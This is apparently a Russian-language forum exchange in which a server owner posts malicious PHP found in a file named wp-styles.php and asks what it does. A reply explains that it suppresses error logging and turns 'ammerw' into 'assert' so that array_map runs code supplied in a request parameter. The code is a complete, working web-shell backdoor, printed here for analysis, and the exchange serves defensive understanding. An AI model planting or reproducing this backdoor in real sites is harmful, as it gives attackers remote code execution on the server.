Я только что нашел этот вредоносный код PHP на своем сервере в файле с именем wp-styles.php. Пожалуйста, помогите мне расшифровать его.
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
$my_str = "ammerw";
$my_str = str_replace("m", "s", $my_str); $my_str = str_replace("w", "t", $my_str);
array_map($my_str, $_REQUEST\["0107e00d68f62ad87fbe5399c1300762"\]);
Я думаю, вам нужно копнуть немного глубже. Как видите, он отключает любые отчеты об ошибках. Строка «ammert» будет преобразована в «assert». Затем array_map использует эту строку как функцию обратного вызова и передает значение, хранящееся в $_REQUEST["0107e00d68f62ad87fbe5399c1300762"] в качестве параметра. Если это значение является строкой, assert запустит этот код! Таким образом, вы должны проверить, какое значение хранится в $_REQUEST с ключом выше. Это может быть очень опасно, в зависимости от кода в суперглобальной переменной $_REQUEST. И, пожалуйста, проверьте, когда вызывается этот непонятный скрипт.
Надеюсь это поможет.
